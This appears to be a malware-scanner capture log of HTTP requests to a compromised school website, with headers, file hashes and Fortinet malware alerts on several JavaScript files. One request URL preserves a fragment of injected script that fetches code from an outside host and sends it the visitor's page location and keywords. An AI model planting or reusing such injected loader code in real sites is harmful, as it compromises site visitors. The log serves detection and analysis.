Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 12 Dec 2016 04:15:12 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   2009
Md5:    f983a73cc3fb7d2fa9d16501014bc3cc
Sha1:   8e4398960ae97d830350bcc7895075daa9ee1be6
Sha256: 62ef68828ac5d1cde776497d85a45df9c3611b0f4125aceb090e24eb2d1b0e17
                                        
                                            GET /media/system/js/mootools-core.js HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 21 Oct 2016 22:38:56 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   31505
Md5:    3845a6119709cc9ddf74a60125767cdb
Sha1:   b6893b4a65c232f8cf8dbfc4d289670ff0bf72f5
Sha256: 29739cc0d35ae855e0aa6c88f41c1f7f25794bb0fa037360a418372dffad2c35

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /modules/mod_ariextmenu/mod_ariextmenu/js/ext-core.js HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Mon, 12 Dec 2016 04:41:22 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   34656
Md5:    a25ee55ce079628e37c63c141bb426b2
Sha1:   ae9c983f723063d268b3e4d1fba5fe14a7b3300a
Sha256: 5099ab9063482faa5adbdb994ea0e65a5237f2087ae254cfc9395ecf670d4997

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/%27%20+%20%27http://1653709.sites.myregisteredsite.com/js/jquery.min.php%27%20+%20%27?key=b64%27%20+%20%27&utm_campaign=%27%20+%20%27snt2014%27%20+%20%27&utm_source=%27%20+%20window.location.host%20+%20%27&utm_medium=%27%20+%20%27&utm_content=%27%20+%20window.location%20+%20%27&utm_term=%27%20+%20encodeURIComponent(((k=(function(){var%20keywords%20=%20%27%27;var%20metas%20=%20document.getElementsByTagName(%27meta%27);if%20(metas)%20{for%20(var%20x=0,y=metas.length;%20x%3Cy;%20x++)%20{if%20(metas[x].name.toLowerCase()%20== HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 406 Not Acceptable
Content-Type: text/html; charset=iso-8859-1
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Content-Length: 226
Connection: keep-alive


--- Additional Info ---
Magic:  HTML document text
Size:   226
Md5:    5360980bad11bf9723da89687501effc
Sha1:   1dd1a5c4e08392684b25d8f6cfd7d670b5d9db99
Sha256: 80a265bed528211aa708dcd58f7a95db36eeb7f873c6fe4ddab0b3a1dc0973a4
                                        
                                            GET /media/system/js/mootools-more.js HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Last-Modified: Fri, 21 Oct 2016 22:38:56 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   80214
Md5:    98d65621fb0c1fd10379dec153733249
Sha1:   f3812b0a9055fc7dd95e1282679817fd91d357f7
Sha256: 39636b0305de252cbe03178e48b322e3107f8164dc0a17a100ebfc622786bacc

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /templates/shahnaz/images/logo.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:36 GMT
Content-Length: 22979
Connection: keep-alive
Last-Modified: Wed, 12 Dec 2012 08:10:14 GMT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   22979
Md5:    8d75d7e7a26da13d93ee9107da346b5b
Sha1:   f37f11229f9e0996f360280f29378332484b0d59
Sha256: 19edaedba86080c767a3711860a6e6493b936fbc71871cf4cbc6d6c25f9a967e
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/images/pctia.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:37 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:37 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6796
Md5:    c334a648f66d6d240ff298078782bb28
Sha1:   6e10cc785b7233ff8f979178a0a4272c7955fced
Sha256: 68ecfa609a8d7b1e7b41e9ea4db0acda4c1741e4ad767d8eb129cc8af7e2958d
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/images/banner1.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:37 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:37 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6796
Md5:    c334a648f66d6d240ff298078782bb28
Sha1:   6e10cc785b7233ff8f979178a0a4272c7955fced
Sha256: 68ecfa609a8d7b1e7b41e9ea4db0acda4c1741e4ad767d8eb129cc8af7e2958d
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/images/applynow.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:37 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:37 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6796
Md5:    c334a648f66d6d240ff298078782bb28
Sha1:   6e10cc785b7233ff8f979178a0a4272c7955fced
Sha256: 68ecfa609a8d7b1e7b41e9ea4db0acda4c1741e4ad767d8eb129cc8af7e2958d
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/images/hairdressing.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:37 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:37 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6796
Md5:    c334a648f66d6d240ff298078782bb28
Sha1:   6e10cc785b7233ff8f979178a0a4272c7955fced
Sha256: 68ecfa609a8d7b1e7b41e9ea4db0acda4c1741e4ad767d8eb129cc8af7e2958d
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/images/aesthetic.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:37 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:37 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6845
Md5:    dd000f35d16173c0627a81b2241d3ef2
Sha1:   724bbb288bee86a903c91f2bf58f4320b9792bd1
Sha256: 256c4c9210d34925eb8927fdb3a32367265121530da480c9c80839346441a49f
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/images/advanced-aesthetic.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:37 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:37 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6796
Md5:    c334a648f66d6d240ff298078782bb28
Sha1:   6e10cc785b7233ff8f979178a0a4272c7955fced
Sha256: 68ecfa609a8d7b1e7b41e9ea4db0acda4c1741e4ad767d8eb129cc8af7e2958d
                                        
                                            GET /vyhcz/wpuiz/rfwlz/vycez/images/bottom-logo.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/vyhcz/wpuiz/rfwlz/vycez/555
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:37 GMT
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 18 Jan 2019 20:55:37 GMT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6845
Md5:    dd000f35d16173c0627a81b2241d3ef2
Sha1:   724bbb288bee86a903c91f2bf58f4320b9792bd1
Sha256: 256c4c9210d34925eb8927fdb3a32367265121530da480c9c80839346441a49f
                                        
                                            GET /templates/shahnaz/images/bg.png HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/templates/shahnaz/css/template.css
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:38 GMT
Content-Length: 1104
Connection: keep-alive
Last-Modified: Thu, 01 Nov 2012 10:10:20 GMT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 26 x 144, 8-bit/color RGB, non-interlaced
Size:   1104
Md5:    2bb09bdc39dfe10d1f4509c67483c31f
Sha1:   f47cc2ad93d16c9ec3dae24d0f524bdffec65efd
Sha256: eb4530ba382d294b05190333c04a57c4bcfb9bb1b947816340eece482aaa0eb5
                                        
                                            GET /templates/shahnaz/images/wrapper1.png HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/templates/shahnaz/css/template.css
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:39 GMT
Content-Length: 1258
Connection: keep-alive
Last-Modified: Thu, 01 Nov 2012 10:10:20 GMT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 25 x 144, 8-bit/color RGB, non-interlaced
Size:   1258
Md5:    e84e4152e2dc330773577deef69878b0
Sha1:   3ec4e2157b58d61d563dae06b34174f7700ae01e
Sha256: 34e73f9911098deb368ff108edb0872485e57b715d553c29559c8dcf5f4f8571
                                        
                                            GET /templates/shahnaz/images/banner-bg.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/templates/shahnaz/css/template.css
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:39 GMT
Content-Length: 4992
Connection: keep-alive
Last-Modified: Thu, 01 Nov 2012 10:10:20 GMT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   4992
Md5:    a6f341c9458a7dc90ed99aeaa91b58ac
Sha1:   42d5c2f062f2af5c7594951f495dddd14e1526ce
Sha256: b3cd18f31c17b5926b44d1f8cd3dc9f95b329a7e41468ee56d99f750dc248eb8
                                        
                                            GET /templates/shahnaz/images/hover-left.png HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/templates/shahnaz/css/template.css
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:39 GMT
Content-Length: 1077
Connection: keep-alive
Last-Modified: Thu, 01 Nov 2012 10:10:20 GMT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 250 x 40, 8-bit/color RGB, non-interlaced
Size:   1077
Md5:    ba34b35b43e44c49adb171d2ae7ae2e6
Sha1:   807b79ef07d8eb127e31228eabae6434c9740004
Sha256: fa29bdf5c473d7f62e546724deddd8879845192ee762dc0bee21ab6554a8f1a5
                                        
                                            GET /templates/shahnaz/images/wrapper.png HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/templates/shahnaz/css/template.css
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:39 GMT
Content-Length: 37008
Connection: keep-alive
Last-Modified: Thu, 01 Nov 2012 10:10:20 GMT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 1401 x 191, 8-bit/color RGBA, non-interlaced
Size:   37008
Md5:    3375587a61cf14a1d9f7f192a8927f9a
Sha1:   5edf833f2b882c0a35efae68ca674855bb4f7429
Sha256: 84bbd89de40812bbe76367618228337842bda5a3aabce74f997f32a2b92de14a
                                        
                                            GET /templates/shahnaz/images/offer-right.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/templates/shahnaz/css/template.css
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:39 GMT
Content-Length: 2437
Connection: keep-alive
Last-Modified: Thu, 01 Nov 2012 10:10:20 GMT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   2437
Md5:    f122a01a79d51e57b5a26d5ecaea5612
Sha1:   c662fab7bfc7cec10a17aa79befd6decbd9a407b
Sha256: 26a9a13e83a0eb98bee55cce92e6c21e25b98d4fd9008091e1d96cd109789795
                                        
                                            GET /templates/shahnaz/images/offer-left.jpg HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/templates/shahnaz/css/template.css
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:39 GMT
Content-Length: 2111
Connection: keep-alive
Last-Modified: Thu, 01 Nov 2012 10:10:20 GMT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   2111
Md5:    ca23eecb0896011f6ef1996ba2402221
Sha1:   146af6c284d8c78970b678221477189f361210dc
Sha256: ebd9600ab9d87835372fc2d8eea76b11a420451dbe194a3ccb4367c27c29e878
                                        
                                            GET /templates/shahnaz/images/courses-heading-bg.png HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/templates/shahnaz/css/template.css
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:39 GMT
Content-Length: 2879
Connection: keep-alive
Last-Modified: Thu, 01 Nov 2012 10:10:20 GMT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 642 x 32, 8-bit/color RGB, non-interlaced
Size:   2879
Md5:    fdbfd7092c65f0ff6ea8d0fc56769d48
Sha1:   3b16453f4d43c0be6ddb3d3ab12fc93f6c1bc2b3
Sha256: f31d371202db2aeed09866e8ca1f558988b596f2be065c8f3d32a785206b5ff4
                                        
                                            GET /templates/shahnaz/images/moredetail-bg.png HTTP/1.1 
Host: neetyscosmetologyschool.ca
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://neetyscosmetologyschool.ca/templates/shahnaz/css/template.css
Cookie: df13429c8b54bf811bb5a7acbc3cd9db=di8m83e7vkd2di52ssjuefeoc6

                                         
                                         192.185.119.94
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx/1.14.1
Date: Fri, 18 Jan 2019 20:55:39 GMT
Content-Length: 1745
Connection: keep-alive
Last-Modified: Thu, 01 Nov 2012 10:10:20 GMT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 199 x 31, 8-bit/color RGB, non-interlaced
Size:   1745
Md5:    3f8442f641bf9365b8c86f81804a2535
Sha1:   d2a615ca0ec77c570289d5af3c3c124c9223e85c
